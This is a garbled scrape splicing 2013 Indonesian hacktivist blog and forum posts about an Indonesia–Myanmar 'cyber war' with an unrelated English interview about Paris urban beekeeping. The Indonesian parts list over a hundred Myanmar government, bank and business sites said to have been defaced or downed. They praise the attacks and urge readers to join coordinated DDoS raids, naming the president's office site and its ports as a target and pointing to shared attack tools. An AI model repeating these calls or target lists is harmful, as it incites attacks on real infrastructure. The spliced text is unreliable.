(Walau UP tapi begitu tampilan web nya) 43 http://gmrockentgroup. com/ SS Sama dengan nomor 42 (Walau UP tapi tampilannya berubah) 44 http://marychapman-mm. org/ SS Sama dengan nomor 42 45 http://asianskytravels. com/ (UP lagi) 46 http://myanmarbizdirectory. com/ 47 http://myanmarfishexporter. com/ 48 http://myanmartravelguides. com/ 49 http: // Royalgoldentortoise. com/ 50 http://talentsnmodels. com/ 51 http://tinaungzawtrading. com/ 52 http://tinmoelwin. com/ 53 http://webasaservice. com/ 54 http://forex. cbm. gov. mm / index. php / fxrate SS http://prntscr. com/s836q (Abajo) 55 http://yau. moai. gov. mm/ 56 http://sd. moai. gov. mm/ 57 http: //amd. moai. gov. mm/ 58 http://wrud. moai. gov. mm/ 59 http://madb. moai. gov. mm/ 60 http://dar. moai. gov. mm/ 61 Http://micde. moai. gov. mm/ 62 www. president-office. gov. mm SS http://prntscr. com/skz8q (403) 63 http://www. tawwincentre. com. mm/ 64 http : //cbm. gov. mm/ 65 www. moc. gov. mm 67 http://www. mptsat. com. mm/ 68 www. elibrary. com. mm 69 http://www. rubyland. com. mm / 70 http://www. people. com. mm/index. cfm 71 http://www. myanmarnlp. org. mm/ 72 http://www. myanmar. net. mm/ 73 http: // www. Pomail. gov. mm/ 74 http://www. irdmyanmar. gov. mm/ 75 http://www. mptmail. net. mm/ 76 www. irrigation. gov. mm 77 www. industry2.gov. mm 78 www. hotel-tourism. gov. mm 79 www. mmmc. edu. mm 80 www. ais. gov. mm 81 www. dca. gov. mm 82 www. mnped. gov. mm 83 www. ais. gov. mm 84 www. hotel-tourism. gov. mm 85 www. industry2.gov. mm 86 www. irdmyanmar. gov. mm 87 www. moc. gov. mm 88 www. pomail. gov. mm 89 www. ns4.nic. net. mm 90 www. hantharwaddy. net. mm 91 www. mptmail. net. mm 92 www. myanmar. net. mm 93 www. nic. net. mm 94 www. wpiteam. net. mm 95 www. npt. net. mm 96 www. elibrary. com. mm 97 www. mptmail. com. mm 98 www. mptsat. com. mm 99 www. myanmarnlp. org. mm 100 www. people. com. mm 101 www. rubyland. com. mm 104 www. mcpa. org. mm 105 http://www. mailtx. teleport. net. mm/ 106 http://ais. gov. mm/ 107 http://asiaholidays. com. mm/ 108 http://tnk. net. Mm / 109 http://www. dca. gov. mm/ 110 http://www. myanmar. com. mm/ 111 http://www. myanmaronline. com. mm/ 112 http: //www. myringtune. Com. mm/ 113 http://www. planet. com. mm/ 114 http://www. redlink. net. mm/ 115 http://redlinkcare. net. mm/ 116 http://rpmm. com. Mm / 117 http://spa. com. mm/ 118 http://webmail. mm. com/ 119 ww. asiaholidays. com. mm 120 www. asialight. com. mm 121 http://asianwingsairways. com. mm / 122 http://asiantrails. com. mm/ 123 www. http: //cbm. gov. mm/ 124 http://www. http: //city. com. mm/ 125 http://cnj. net. mm/ 126 Http://commerce. gov. mm/ 127 http://consultancy. com. mm/ 128 http://cosco. com. mm/ 129 http://ct. com. mm/ 130 www. daewooenp. com. Mm 131 www. dca. gov. mm 132 www. earth. com. mm 133 www. eleven. com. mm 134 www. enjoy. net. mm 135 www. geocomp-myanmar. net. mm 136 globalnet. com. mm 137 Www. europe. com www2.cochrane. com thumb up thumb down 135 mb. com. mm 136 mes. org. mm 137 mins. mm 138 mit. com. mm 139 mofr. Myanmar. gov. mm myanmar. gov. mm 147 myanmaronline. net myanmaronline. net thumb up thumb down [...]. Mm 148 myanmartradenet. com. mm 149 myanmatimber. com. mm 150 myanpay. net. mm 151 myantel. net. mm 152 myringtune. com. mm 153 myringtuneonline. com. mm 154 nebula. com. mm 155 nestlemyanmar. com. mm 156 Www. europa. com www. europa. com www2.cochrane. org www2.cemex. com www2.cemex. com thumb up thumb down 164 spa. com. mm 165 sunfar. com. mm 166 super. com. mm 167 talisman. com. mm 168 teleport. net. mm 169 thaiairways. com. mm 170 todaygroup. com. mm 171 tourmandalay. com. mm 172 ucsb. gov. mm 173 umfcci. com. mm 174 ummg. edu. mm 175 webmail. com. mm 176 wimaxmail. net. mm 177 yangtse. com. mm 178 yatanarponca. com. mm 179 yomabank. com. mm 180 zte. com. mm 181 http://www. commerce. gov. mm/index. php SS http://prntscr. com/sg3ch (404) 182 http://myanmarpoliceforce. org SS http://prntscr. com/sg0k7 (Down) 183 http://www. ourmyanmar. org/ SS http://prntscr. com/sg1e9 (Deface)

Website yang telah di bobol Myanmar

1 http://ghiaforqueensland. com/ 2 http://andis-video. com/index. php 3 http://dekranasda-anambaskab. com/ 4 http://maxtel. co. id/ 5 http://www. smp17tegal. sch. id/ 6 http://www. pohon. web. id/ 7 http://campuraduk. info/ 8 http://alirsyadsatya. sch. id/ 9 http://jesseaddicted. web. id/ 10 http://www. walhi-jogja. or. id/ 11 http://berita. walhi-jogja. or. id/ 12 http://donasi. walhi-jogja. or. id/ 13 http://ppesumapapua. net/ 14 http://sepedatua. web. id/ 15 http://www. alfarizisalman. web. id/ 16 http://mde. co. id/ 17 http://shalink. walhi-jogja. or. id/ 18 http://nissanpilihanmu. com/index. php 19 http://shosha. co. id/index. php 20 http://mediaartha. com/index. php 21 http://trafo-sintra. com/index. php 22 http://bkoo. info/ 23 http://eaglespiritindonesia. com/ 24 http://www. forwebhost. com/ 25 http://jendelakita. net/ 26 http://baznas-sawahlunto. com/ 27 http://gee. web. id/ 28 http://ghinaghani. com/ 29 http://jumlahbalita. gee. web. id/ 30 http://gee. kevtidungtour. com/ 31 http://ghinaghani. kevtidungtour. com/ 32 http://kevtidungtour. com/ 33 http://smpn1cangkringan. sch. id/ 34 http://rumah-jogja. net/ 35 http://www. fisio-medical. com/medical/ 36 http://produsendrumband. com/ 37 http://slemanjogja. com/ 38 http://www. agungportal. net/ 39 http://www. amartacom. co. id/ 40 http://smaislamkarangrayung. sch. id/ 41 http://bukitsula. com/ 42 http://www. gazzeleather. com/ 43 http://serbapedas. com/ 44 http://trailntrail. com/ 45 http://smk-dpb. sch. id/ 46 http://www. smp1pandak. sch. id/beta/ 47 http://banyusumilir. com/ 48 http://efatechno. com/ 49 http://hipnoweb. com/ 50 http://coetbd. com/ 51 http://www. samiul. info/ 52 http://yogya. litbang. deptan. go. id/ind/ *** 53 http://upbs. litbang. deptan. go. id/ *** 54 http://sumut. litbang. deptan. go. id/ind/ *** 55 http://sultra. litbang. deptan. go. id/ *** 56 http://sulbar. litbang. deptan. go. id/ *** 57 http://simpeg. litbang. deptan. go. id/ *** 58 http://riau. litbang. deptan. go. id/ *** 59 http://pse. litbang. deptan. go. id/ind/ *** 60 http://ppsl. litbang. deptan. go. id/ *** 61 http://pfi3p. litbang. deptan. go. id/ *** 62 http://peternakan. litbang. deptan. go. id/ *** 63 http://nad. litbang. deptan. go. id/ *** 64 http://lolitsapi. litbang. deptan. go. id/ *** 65 http://lolitkambing. litbang. deptan. go. id/ *** 66 http://kkp3n. litbang. deptan. go. id/ *** 67 http://kaltim. litbang. deptan. go. id/ *** 68 http://kalteng. litbang. deptan. go. id/ *** 69 http://worldofindonesia. com/ 70 http://indo-design. net/ 71 http://mtsalmukarromahsampang. sch. id/ 72 http://www. worldofindonesia. com/ 73 http://spareparts-ac. co. id/ 74 http://www. monk-eworks. com/ 75 http://www. toshik. net/ 76 http://mhpp2.or. id/ 77 http://indonesia. mtsalmukarromahsampang. sch. id/ 78 http://lib. mtsalmukarromahsampang. sch. id/ 79 http://opac. mtsalmukarromahsampang. sch. id/ 80 http://opac1.mtsalmukarromahsampang. sch. id/ 81 http://web. mtsalmukarromahsampang. sch. id/ 82 http://www. patriziafalcione. com/ 83 http://konten. mediax9.com/ 84 http://galeri. probolinggokota. go. id/ *** 85 http://aipack. co. id/ 86 http://mandiri. aipack. co. id/ 87 http://projects. aipack. co. id/ 88 http://simdp. net/ 89 http://dev. simdp. net/ 90 http://wpm. simdp. net/ 91 http://portalculturespecialist. com/ 92 http://mevarental. com/ 93 http://mandiriclub. com/ 94 http://www. pa-lubukbasung. go. id/ *** 95 http://pa-solok. go. id/ *** 96 http://anekamultidata. com/index. php 97 http://investigasionline. com/ 98 http://liranewssumut. com/ 99 http://ompudamanik. com/ 100 http://permatamedia. com/ 101 http://trisadha. com/ 102 http://www. rajaproduction. com/ 103 http://easthealthindonesia. com/ 104 http://www. paperplane20.com/ 105 http://victor-furniture. com/ 106 http://kanestudio. net/ 107 http://www. teruskan. com/ (db drop) tit tot 108 http://www. kputanjungbalai. com/ 109 http://bclwlogistics. com/ 110 http://www. forwarderjakarta. com/ 111 http://forwardingindonesia. com/ 112 http://forwardingjakarta. com/ 113 http://jakartaforwarder. net/ 114 http://southeastforwarder. com/ 115 http://www. forwarderjakarta. com/ 116 http://bpsi. co. id/ 117 http://www. bsii. co. id/ 118 http://greeninnovation. or. id/ 119 http://pa-magetan. go. id/ *** 120 http://www. selnajayarecruitment. com/ 121 http://sdvidatra. web. id/ 122 http://akademimiliter. web. id/ http://www. hack-db. com/76310.html

123 http://admbisnis. fisip. undip. ac. id/ http://www. hack-db. com/216499.html

124 http://www. smp1pandak. sch. id/beta/ http://www. hack-db. com/215661.html

125 http://smk-dpb. sch. id/ http://www. hack-db. com/215621.html

126 http://mde. co. id/ http://www. hack-db. com/215566.html

127 http://www. alfarizisalman. web. id/ http://www. hack-db. com/215565.html

128 http://alirsyadsatya. sch. id/ http://www. hack-db. com/215424.html

129 http://jesseaddicted. web. id/ http://www. hack-db. com/215422.html

130 http://ahmadbani21.web. id/ http://www. hack-db. com/77134.html

131 http://www. sman1-cbi. sch. id/ http://www. hack-db. com/77133.html

132 http://unda. ac. id/stih/ http://www. hack-db. com/76674.html

133 http://mejadiskusi. web. id/ http://www. hack-db. com/76423.html

134 http://alienware. co. id/ http://www. hack-db. com/76422.html

135 http://smk1pancasila. sch. id/ http://www. hack-db. com/76421.html

136 http://man1kotaprobolinggo. sch. id/ http://www. hack-db. com/75410.html

137 http://smaplas. sch. id/ http://www. hack-db. com/75406.html

138 http://www. smp17tegal. sch. id/ http://www. hack-db. com/75351.html

139 http://www. stdiis. ac. id/ http://www. hack-db. com/75351.html

140 http://sharkame. web. id/ http://www. hack-db. com/75013.html

141 http://zetacomm. co. id/ http://www. hack-db. com/75007.html

142 http://www. fisip. undip. ac. id/ http://www. hack-db. com/74767.html

143 http://widyart. web. id/ http://www. hack-db. com/74766.html

144 http://www. permatagbkp. or. id/ http://www. hack-db. com/74765.html

145 http://www. shenamasyita. web. id/ http://www. hack-db. com/74764.html

146 http://vcm. co. id/ http://www. hack-db. com/74763.html

147 http://mysimpleworld. web. id/ http://www. hack-db. com/74487.html

148 http://www. sman1babelan. sch. id/v3/ http://www. hack-db. com/74302.html

149 http://iro. umy. ac. id/ http://www. hack-db. com/74301.html

150 http://smkswadayasemarang. sch. id/v1/ http://www. hack-db. com/73926.html

151 http://www. palsin. co. id/ http://www. hack-db. com/73925.html

152 http://dewata. co. id/sites/ http://www. hack-db. com/73690.html

153 http://www. amcor. lib. unair. ac. id/kentang/joomla16 http://www. hack-db. com/73647.html

154 http://yulianifitriana. web. id/ http://www. hack-db. com/73592.html

155 http://www. starfox. web. id/ http://www. hack-db. com/73591.html

156 http://chalidaulia. web. id/ http://www. hack-db. com/73580.html

157 http://gucciana. web. id/ http://www. hack-db. com/73578.html

158 http://www. jsoft. web. id/ http://www. hack-db. com/73291.html

159 http://threebroomsticks. web. id/ http://www. hack-db. com/73290.html

160 http://sitahesti. web. id/ http://hack-db. com/226322.html

162 http://bp2ipbarombong. sch. id/ http://hack-db. com/226454.html

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The Buzz on Paris Honey

Edited by Sophie Delon

The artist and urban beekeeper Olivier Darné sets up beehives and transforms Paris into a place for gathering nectar. In this insightful interview, he tells us about his career and the initiatives of his association, the “Parti Poétique.” He also explains his two major projects: the Miel Béton, honey produced in Paris, and the Banque du Miel, a temporary meeting and tasting space for the general public. Read on for an encounter with a very atypical artist.

What path had your career taken up to the creation of the Parti Poétique?

I studied art at the School of Applied Arts in Paris, then at the Ecole Estienne, a school for design, communications and professions relating to the art of books, before founding Parti Poétique in 2004. This association brings together an interdisciplinary team of artists, botanists, urban planners, anthropologists, walkers, inhabitants and the curious who use bees to question the lifestyle of city dwellers. Bees are at the heart of our project.

You describe yourself as an artist and urban beekeeper. Could you explain what that means?

I do not come from any beekeeping tradition, but I have always been interested in bees. I had the idea of setting up beehives in Paris to observe their behavior. I find that they reveal the harmful effects of our urban ways. Observing bees is an important key to understanding the world around us.

In what way is a city like Paris a favored place of action for you?

I quickly asked myself questions about city life and with the Parti Poétique, I began to set up beehives to begin what I call “the pollination of the city of Paris.” We have installed numerous beehives more or less everywhere in Paris: on the square in front of the Centre Pompidou, at the Parc de la Villette, at the Porte de Montreuil. Very quickly, we collected the honey produced by our bees and we began to put the Parisian honey into jars. We therefore gave it the name “ Miel Béton .” [Editor's note: this translates into "concrete honey."]

You could say that Miel Béton is 3,000 hectares of the city in a jar of honey. We set up the beehives in Paris, because it is through the behavior of the bees that we examine the lifestyle of the inhabitants of Paris. For us, every one of these beehives is a mini observation center of an area extending over three kilometers, equivalent to the area in which bees collect nectar. With 3 to 4 million bees present all year in the hives on the roof of the Saint-Denis town hall to the north of Paris, we produce around one ton of honey each year. We allocate 200 to 300 kg of honey per year for public tasting sessions that we organize. The analyses of this honey also provide us with information on the composition of the air in Paris. On this point, we have discovered more than 300 different types of pollen in our honey. This perhaps explains the numerous medals that we have won since 2001 at the regional agricultural competition. Each district has its own unique honey whose flavor is linked to the environment and lifestyle of its inhabitants. Finally, I like to think that this Miel Béton is the concentration of geographies and histories of a city put into a jar. This rich and complex urban nectar is the image of the extraordinary mobility of people who live in and visit Paris.

How did you come to create the Banque du Miel project?

With this project of applied research, the Parti Poétique is extending its activity of collecting Paris honey by organizing tastings. During these sessions that we have organized in Paris, Lyon, Seine-Saint-Denis, Geneva and even in Rouen, we share our harvest with the public. These tasting sessions are also the opportunity for dialogue on current themes, such as ecology or even the current economic situation.

To what extent is your project an ecological and sustainable development initiative?

We make public the perilous state of nature, notably by explaining the deterioration of the ecosystem and the progressive disappearance of the bees. With the Banque du Miel, we try to make the public aware of the pressures that man puts on the environment in which he lives. More and more, we observe that city dwellers are becoming disconnected from the physical reality: the earth, the weather, the seasons, etc. In the light of these observations, we try together to find some answers, some solutions less harmful for man and the environment.

You’re currently carrying out a project in the little public garden of la Gare-de-Charonne at Porte de Montreuil. How did this project come about?

The project of the “pollination of Paris” arose from the major urban renewal development plan initiated by the Paris City Council in the Porte de Montreuil district. With the Parti Poétique, we installed urban pollinators, containers developed for man and bees in the public garden of the Gare-de-Charonne in the summers of 2006, 2007 and 2008. In 2009, we set up a mobile counter for the Banque du Miel which moved between two districts to reveal the rich taste. With the bee as a witness, these installations reveal our relationship go the urban environment, its flow, its social organization, and therefore our attachment to the city. We use the bees to speak about a district and to weave links in places where they may not exist.

What future projects do you have in Paris?

In September, we are launching the project titled “ la bourse ou la vie ” and we are setting up a Banque du Miel counter in front of the Bourse de Paris. We are going to offer tasting sessions of the Miel Béton. It is a sharing of the bounty. In this way, we let people discover our honey and we organize a little informal discussion around the current economic organization or the ecological situation. In September, we are also invited to appear at the Centre Pompidou in the company of the landscape architect Gilles Clément, in order to present our projects and our initiatives to the public. We also plan to open a venue in Seine-Saint-Denis, which is where I come from and where I am currently working. It would be a base where everyone who is interested in what we do could meet. There would be an exhibition space devoted to table arts and artists in residence. I recently met Yannick Alléno, the chef at the Paris hotel Le Meurice, and he is willing to collaborate on this project.

Where to find Miel Béton?

PRINTEMPS DESIGN Centre Pompidou, Paris 4th Tel +33 (0) 1 44 78 15 78

LIBRAIRIE DU PARC Parc de la Villette 211 avenue Jean Jaurès, Paris 19th Tel +33 (0) 1 42 38 37 52

Perang Hacker Indonesia VS Myanmar 2013

Chyberart - Beberapa hari ini merupakan hari perjuangan bagi para hacktivist (Aktivist Hacker) termasuk saya berjuang untuk membela Indonesia walaupun saya masih newbie tapi saya tetap salurkan kemampuan saya walaupun hanya bantu DDO S, ok langsung saja ke tkp sudah malam juga ni abang sudah ngantuk. hahahaaa lebai. D karena telah banyak situs situs web Indonesia yang telah tumbang oleh para Hacker Myanmar dan menghina agama Islam. Hacker Indonesia telah berjuang dengan ikhlasnya menahan serangan dan menyerang ke ISP dan website website Myanmar.

Siapa lagi yang akan berjuang. ia pastinya para Hacker Indonesia lah yang akan berjuang dari Sabang sampai Marauke. Inilah salah satu bentuk kepedulian kami terhadap Indonesia, yang mungkin sebagian besar dari Indonesia tidak mengetahuinya. Bahkan sampai detik ini media belum ada yang memberitakan informasi penting ini.

Memang Myanmar lebih mudah merusak situs Indonesia dikarenakan banyaknya situs Indonesia dibanding Myanmar. Di Indonesia ada google. co. id yang memudahkan mereka untuk mencari banyak target sedangkan Myanmar tidak memiliki fasilitas google dan situs mereka sangat lah dikit. Sangat sulit jika harus masuk celah kemanan.

Begitu banyak situs kita yang menjadi korban dikarenakan menjamurnya situs Web Indonesia di google. co. id

Situs Web Myanmar yang Pernah Down :

Cyber War Hacker Indonesia vs Hacker Myanmar

Inilah dalang Grup yang telah meretas Situs situs indonesia. - & gt; http://www. blinkhackergroup. org/ Tapi sayang, website itu type DNS nya. blogspot Lebih lengkap lihat disini

Serangan serempak telah dilakukan oleh Hacker Indonesia ke ISP dan website-website Myanmar . di karenakan ini adalah bentuk kepedulian Hacker Indonesia dengan apa yang telah di lakukan oleh Hacker Myanmar yang telah merusak website - website Indoensia. Hacker Indonesia berjuang untuk membelah MARTABAT, dan HARGA DIRI BANGSA INDONESIA yang telah di lecehkan oleh negara lain. Disaat 230 situs Indonesia bahkan lebih dihajar oleh Myanmar, siapakah yang membalas ?

Apakah polisi cyber Indonesia. Apakah pemerintah Indonesia. Tidak. Hacker lah yang dengan gigih menjunjung tinggi derajat bangsa ini dengan melakukan gerakan OP Myanmar. Tanpa digaji pun hacker Indonesia akan bahu membahu membalas serangan yang dilakukan oleh Myanmar. Seperti yang kita ketahui, Myanmar sangat mudah melakukan aksi deface masal ke situs Indonesia karena mereka difasiliatsi untuk itu. Maksudnya. Ya, situs Indonesia sangat banyak. Jelas sangat mudah jika hanya mencari bug dan kemudian melakukan symlink. Di Indonesia ada google. co. id yang memudahkan mereka melakukan scan terhadap web target. Bandingkan dengan mereka. Situs Myanmar sedikit. Di sana tidak ada situs google. Sangat sulit jika harus masuk lewat celah keamanan. Oleh karena itu, diputuskan malam ini DDoSer Indonesia akan melakukan balasan dengan meratakan situs-situs Myanmar secara bersama-sama.

Beberapa serangan telah di lancarkan ke negara Myanmar, di bawah ini list website Myanmar yang sudah pernah down, di deface, hacked, dan 404.

ais. gov. mm

amd. moai. gov. mm

asiaholidays. com. mm

asialight. com. mm

asianskytravels. com

asiantrails. com. mm

asianwingsairways. com. mm

cbm. gov. mm

city. com. mm

cnj. net. mm

commerce. gov. mm

consultancy. com. mm

cosco. com. mm

ct. com. mm

daewooenp. com. mm

dar. moai. gov. mm

dca. gov. mm

earth. com. mm

eleven. com. mm

elibrary. com. mm

enjoy. net. mm

forex. cbm. gov. mm

forum. myanmarfrangipanitours. com

geocomp-myanmar. net. mm

globalnet. com. mm

globalsongroup. com

gmrockentgroup. com

hantharwaddy. net. mm

hotel-tourism. gov. mm

indiaembassy. net. mm

industry2.gov. mm

irdmyanmar. gov. mm

irrigation. gov. mm

irrigation. gov. mm

isy. net. mm

kmd. com. mm

madb. moai. gov. mm

mail4u. com. mm

mailtx. teleport. net. mm

marychapman-mm. org

mbl. com. mm

mcpa. org. mm

mes. org. mm

micde. moai. gov. mm

mining. com. mm

mit. com. mm

mmmc. edu. mm

mnped. gov. mm

moc. gov. mm

mofr. gov. mm

mosports. gov. mm

mot. gov. mm

mpa. gov. mm

mprlnet. com. mm

mptmail. com. mm

mptmail. net. mm

mptsat. com. mm

mwd. com. mm

myanmar. com. mm

myanmar. gov. mm

myanmar. net. mm

myanmarbizdirectory. com

myanmarfishexporter. com

myanmarnlp. org. mm

myanmaronline. com. mm

myanmaronline. net. mm

myanmartradenet. com. mm

myanmartravelguides. com

myanmatimber. com. mm

myanpay. net. mm

myantel. net. mm

myringtune. com. mm

myringtuneonline. com. mm

nebula. com. mm

nestlemyanmar. com. mm

nic. net. mm

npt. net. mm

ns4.nic. net. mm

opal. net. mm

people. com. mm

planet. com. mm

pomail. gov. mm

president-office. gov. mm

primeboss. com. mm

redlink. net. mm

redlinkcare. net. mm

royalgoldentortoise. com

royalwhisky. net. mm

rpmm. com. mm

rubyland. com. mm

sb. gov. mm

sd. moai. gov. mm

spa. com. mm

sunfar. com. mm

super. com. mm

talentsnmodels. com

talisman. com. mm

tawwincentre. com. mm

teleport. net. mm

thaiairways. com. mm

tinaungzawtrading. com

tinmoelwin. com

tnk. net. mm

todaygroup. com. mm

tourmandalay. com. mm

ucsb. gov. mm

umfcci. com. mm

ummg. edu. mm

webasaservice. com

webmail. mm. com

wimaxmail. net. mm

wpiteam. net. mm

wrud. moai. gov. mm

yangtse. com. mm

yatanarponca. com. mm

yau. moai. gov. mm

yomabank. com. mm

zte. com. mm

6 komentar:

Semoga Pemerintah Indonesia sadar perlunya pejuang cyber. portal resmi RI http://indonesia. go. id/ sudah tumbang di hajar myanmar tapi pemerintah kok diam aja atau. lebih penting ngurusin uang saku. Jayalah Indonesia Cyber.

Cyber War Indonesia Vs Myanmar

Tuesday, 12 February 2013

War Cyber Indonesia vs Myanmar. Beberapa hari ini merupakan hari perjuangan bagi para hacktivist (Aktivist Hacker) karena telah banyak situs² web Indonesia yang telah tumbang oleh para Hacker Myanmar & menghina agama Islam. Hacker Indonesia telah berjuang untuk membela Martabat Dan Har ga Diri Bangsa Indon esia dengan ikhlasnya menahan serangan & menyerang ke ISP dan Website² Myanmar.

Disaat ratusan site/situs Indonesia dihajar & dideface, siapakah yg membalasnya.

Apakah polisi cyber Indonesia. Apakah pemerintah Indonesia. Tidak. Hacker lah yang dengan gigih menjunjung tinggi derajat bangsa ini dengan melakuka n gerakan OP Myanmar. Tanpa digaji pun hacker Indonesia akan bahu membahu membalas serangan yang dilakukan oleh Myanmar. Seperti yang kita ketahui, Myanmar sangat mudah melakukan aksi deface masal ke situs Indonesia karena mereka difasiliatsi untuk itu. Maksudnya. Ya, situs Indonesia sangat banyak. Jelas sangat mudah jika hanya mencari bug dan kemudian melakukan symlink. Di Indonesia ada google. co. id yang memudahkan mereka melakukan scan terhadap web target. Bandingkan dengan mereka. s itus Myanmar sedikit. Di sana tidak ada situs google. Sangat sulit jika harus masuk lewat celah keamanan. Oleh karena itu, diputuskan malam ini DDoSer Indonesia akan melakukan balasan dengan meratakan situs-situs Myanmar secara bersama-sama.

Dibentuk Pada Awal Februari 2013

Operasi ini bertujuan untuk membalas hinaan hacker ² myanmar yang telah me retas site ² Indonesia dan merubah tampilan dengan ga mbar yang sangat menistakan. Pe nghinaan dan penistaan aga m a Islam oleh hacker ² myanmar akan kami balas dengan tepat, kami akan rontokkan website-website myanmar, mari bergabung bersama kami.

Situs-situs Strategis Myanmar Luluh Lantah oleh Hacker Indonesia

Sukses dengan melumpuhkan beberapa situs strategis Myanmar seperti Situs - situs Bank dan situs pemerintahan Myanmar. para Hacker Indonesia masih belum puas dengan hasil tersebut terbukti dari semakin banyaknya situs strategis yang berhasil mereka lumpuhkan. Bahkan U Zaw Htay selaku direktur kantor President U Thein Sein langsung menulis di halaman facebooknya “Website President telah luluh oleh serangan hacker Indonesia begitupun Website Eleven Media dan Voice weekly juga dihack, sumber serangan dari Indonesia. (Myanmarupdate ) Malam ini situs pertahanan server Myanmar yang merupakan Situs Full service Provider mereka yakni Myanmar Teknologi Gateway beerhasil mereka luluh lantahkan sehingga database MTG error dan tak dapat diakses. Berikut beberapa situs strategis Myanmar yang berhasil para Hacker Indonesia luluh lantahkan:

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Indonesia VS Myanmar perang Cyber

Beberapa hari ini merupakan hari perjuangan bagi para hacktivist (Aktivist Hacker) karena telah banyak situs situs web Indonesia yang telah tumbang oleh para Hacker Myanmar dan menghina agama Islam. Hacker Indonesia telah berjuang dengan ikhlasnya menahan serangan dan menyerang ke ISP dan website website Myanmar.

Siapa lagi yang akan berjuang. ia pastinya para Hacker Indonesia lah yang akan berjuang dari Sabang sampai Marauke. Inilah salah satu bentuk kepedulian kami terhadap Indonesia, yang mungkin sebagian besar dari Indonesia tidak mengetahuinya. Bahkan sampai detik ini media belum ada yang memberitakan informasi penting ini.

Memang Myanmar lebih mudah merusak situs Indonesia dikarenakan banyaknya situs Indonesia dibanding Myanmar. Di Indonesia ada google. co. id yang memudahkan mereka untuk mencari banyak target sedangkan Myanmar tidak memiliki fasilitas google dan situs mereka sangat lah dikit. Sangat sulit jika harus masuk celah kemanan.

Jika anda ingin melihat situs web Indonesia yang menjadi korban silakan buka link ini :

Begitu banyak situs kita yang menjadi korban dikarenakan menjamurnya situs Web Indonesia di google. co. id

Situs Web Myanmar yang Pernah Down.

ais. gov. mm

amd. moai. gov. mm

asiaholidays. com. mm

asialight. com. mm

asianskytravels. com

asiantrails. com. mm

asianwingsairways. com. mm

cbm. gov. mm

city. com. mm

cnj. net. mm

commerce. gov. mm

consultancy. com. mm

cosco. com. mm

ct. com. mm

daewooenp. com. mm

dar. moai. gov. mm

dca. gov. mm

earth. com. mm

eleven. com. mm

elibrary. com. mm

enjoy. net. mm

forex. cbm. gov. mm = Down http://prntscr. com/s836q

forum. myanmarfrangipanitours. com

geocomp-myanmar. net. mm

globalnet. com. mm

globalsongroup. com

gmrockentgroup. com

hantharwaddy. net. mm

hotel-tourism. gov. mm

indiaembassy. net. mm

industry2.gov. mm

irdmyanmar. gov. mm

irrigation. gov. mm

irrigation. gov. mm

isy. net. mm

kmd. com. mm

madb. moai. gov. mm

mail4u. com. mm

mailtx. teleport. net. mm

marychapman-mm. org

mbl. com. mm

mcpa. org. mm

mes. org. mm

micde. moai. gov. mm

mining. com. mm

mit. com. mm

mmmc. edu. mm

mnped. gov. mm

moc. gov. mm

mofr. gov. mm

mosports. gov. mm

mot. gov. mm

mpa. gov. mm

mprlnet. com. mm

mptmail. com. mm

mptmail. net. mm

mptsat. com. mm

mwd. com. mm

myanmar. com. mm

myanmar. gov. mm

myanmar. net. mm

myanmarbizdirectory. com

myanmarfishexporter. com

myanmarnlp. org. mm

myanmaronline. com. mm

myanmaronline. net. mm

myanmartradenet. com. mm

myanmartravelguides. com

myanmatimber. com. mm

myanpay. net. mm

myantel. net. mm

myringtune. com. mm

myringtuneonline. com. mm

nebula. com. mm

nestlemyanmar. com. mm

nic. net. mm

npt. net. mm

ns4.nic. net. mm

opal. net. mm

people. com. mm

planet. com. mm

pomail. gov. mm

president-office. gov. mm

primeboss. com. mm

redlink. net. mm

redlinkcare. net. mm

royalgoldentortoise. com

royalwhisky. net. mm

rpmm. com. mm

rubyland. com. mm

sb. gov. mm

sd. moai. gov. mm

spa. com. mm

sunfar. com. mm

super. com. mm

talentsnmodels. com

talisman. com. mm

tawwincentre. com. mm

teleport. net. mm

thaiairways. com. mm

tinaungzawtrading. com

tinmoelwin. com

tnk. net. mm

todaygroup. com. mm

tourmandalay. com. mm

ucsb. gov. mm

umfcci. com. mm

ummg. edu. mm

webasaservice. com

webmail. mm. com

wimaxmail. net. mm

wpiteam. net. mm

wrud. moai. gov. mm

yangtse. com. mm

yatanarponca. com. mm

yau. moai. gov. mm

yomabank. com. mm

zte. com. mm

dan lain lain

Tambahan genting buat orang Madura:

Cyber War. Indonesia vs Myanmar

Quote: Karena banyak yang tanya caranya. Maka ane kasih tau caranya untuk membantu para Hacker Indonesia. Gampang ko gan caranya, cuma buka web doang abis itu selesai. Caranya agan klik DISINI Maaf ya gan baru update sekarang

Quote: Bismillahir Rahmanir Rahiim, Amma Ba'du, mari kita tegakkan kepala dan kerahkan kemampuan yang kita miliki. rasist myanmar sudah berkali2 melakukan penghinaan seperti gambar yang saya upload ini, mereka sudah di luar batas toleransi, jadi mari kita serang ruang internet myanmar sampai benar2 terpuruk dari dunia maya, serang website myanmar yang berkaitan dengan financial myanmar. siapkan diri anda, kabari teman2 anda, ba'da isya kita lakukan serangan serempak

Target Last Update 17-07-2013 01:49 PM

Bismillahir Rahmanir Rahiim, adalah hal yang perlu konsistensi dan kesabaran yang tinggi untuk menghajar site presiden myanmar supaya DOWN dalam jangka panjang, karena sebagai symbol representatif dan supremasi myanmar maka sangat wajar apabila server dan site tersebut di jaga dengan ketat dan dengan system keamanan yang berlapis2, untuk itu saya himbau kepada teman2 selama belum ada postingan terbaru maka kita serang terus tanpa henti sambil mempelajari terus system keamanan yang di pergunakan di site tersebut. di sini kita learning by doing, ada target yang jelas, ada tantangan yang sangat menantang untuk di taklukkan, jadi mari kita sama2 untuk mengasah kemampuan dengan terarah. serang terus target sampai benar2 DOWN..

Target => http://www. president-office. gov. mm/ IP I => | Port => 80 ; 443 IP II => | Port => 80 ; 443 [on - off]

gunakan tools2 attack yang sudah di share di OP ini, silahkan cek dokument.

Satu Niat - Satu Semangat - Satu Komando

Quote: Sejak kemarin gerakan #OPMyanmar ramai dibicarakan di berbagai sosial media. Itu lantaran Myanmar cari ribut dengan mendeface ratusan situs Indonesia. Untuk motifnya saya sendiri tidak tahu. Yang jelas mereka sudah siap terbakar karena berani bermain api dengan Hacker Indonesia. Disaat 230 situs Indonesia dihajar oleh Myanmar, siapakah yang membalas ?

